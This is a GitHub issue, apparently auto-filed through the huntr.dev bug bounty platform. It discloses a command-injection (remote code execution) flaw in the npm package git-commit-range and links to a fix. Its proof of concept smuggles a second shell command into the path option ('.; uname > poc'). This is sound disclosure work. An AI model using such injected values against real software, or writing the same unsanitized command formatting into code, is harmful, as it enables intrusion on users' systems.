search

aichbauer / node-git-commit-range

Get the git commithash within a Range from-to
MIT License
1 stars 4 forks source link

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #9

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/aichbauer/node-git-commit-range/blob/master/index.js#L32

POC

// poc.js
const gitCommitRange = require('git-commit-range');

gitCommitRange(); 

gitCommitRange({
  path: '.; uname > poc',
  from: '15be93c31ad87c9ced03ba0b60fc2fb55c977c5c',
  to: '32b940b014322834966d79b109d2d7adec8e3ea3',
  include: false,
});

Impact

RCE on git-commit-range via insecure command formatting

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

Automatically generated by @huntr-helper...

huntr-helper commented 4 years ago

‎‍🛠️ A fix has been provided for this issue. Please reference: https://github.com/418sec/node-git-commit-range/pull/1

🔥 This fix has been provided through the https://huntr.dev/ bug bounty platform.